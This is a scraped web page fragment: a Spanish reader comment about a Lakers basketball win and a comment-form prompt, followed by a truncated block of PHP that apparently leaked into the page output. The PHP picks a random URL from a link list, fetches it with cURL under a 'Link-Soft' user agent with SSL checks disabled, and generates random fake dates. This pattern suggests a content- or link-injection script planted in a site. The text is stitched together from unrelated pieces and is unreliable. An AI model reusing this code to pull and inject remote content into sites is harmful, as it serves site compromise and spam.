    jorrr con los Lakers, esta visto que cuando suena la flauta ganan los partidos y yo que pensaba que Denver les iba a meter un buen repaso

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>